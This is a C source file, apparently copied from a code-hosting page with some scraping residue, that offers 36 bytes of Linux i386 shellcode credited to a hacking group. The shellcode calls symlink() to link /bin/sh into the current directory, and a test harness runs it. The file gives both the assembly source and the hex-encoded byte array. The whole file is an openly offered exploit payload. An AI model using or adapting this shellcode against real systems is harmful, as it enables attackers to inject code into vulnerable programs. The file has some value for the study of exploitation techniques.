59 lines
No EOL
701 B
C
59 lines
No EOL
701 B
C
/*The shellcode calls the symlink() and makes the
|
|
link to the /bin/sh in the current dir.
|
|
size = 36 bytes
|
|
OS = Linux i386
|
|
written by /rootteam/dev0id (rootteam.void.ru)
|
|
|
|
|
|
|
|
BITS 32
|
|
|
|
jmp short callit
|
|
|
|
doit:
|
|
|
|
pop esi
|
|
xor eax,eax
|
|
mov byte [esi+7],al
|
|
mov byte [esi+10],al
|
|
mov byte al,83
|
|
lea ebx,[esi]
|
|
lea ecx,[esi+8]
|
|
int 0x80
|
|
|
|
|
|
callit:
|
|
call doit
|
|
|
|
db '/bin/sh#sh#'
|
|
*/
|
|
|
|
char shellcode[]=
|
|
"\xEB\x12"
|
|
"\x5E"
|
|
"\x31\xC0"
|
|
"\x88\x46\x07"
|
|
"\x88\x46\x0A"
|
|
"\xB0\x53"
|
|
"\x8D\x1E\x8D\x4E"
|
|
"\x08\xCD"
|
|
"\x80\xE8\xE9"
|
|
"\xFF"
|
|
"\xFF"
|
|
"\xFF\x2F"
|
|
"\x62\x69\x6E"
|
|
"\x2F"
|
|
"\x73\x68"
|
|
"\x23\x73\x68"
|
|
"\x23";
|
|
|
|
|
|
int
|
|
main (void)
|
|
{
|
|
void (*code)(void);
|
|
code=(void(*)())shellcode;
|
|
(void)code();
|
|
return 0;
|
|
|
|
} |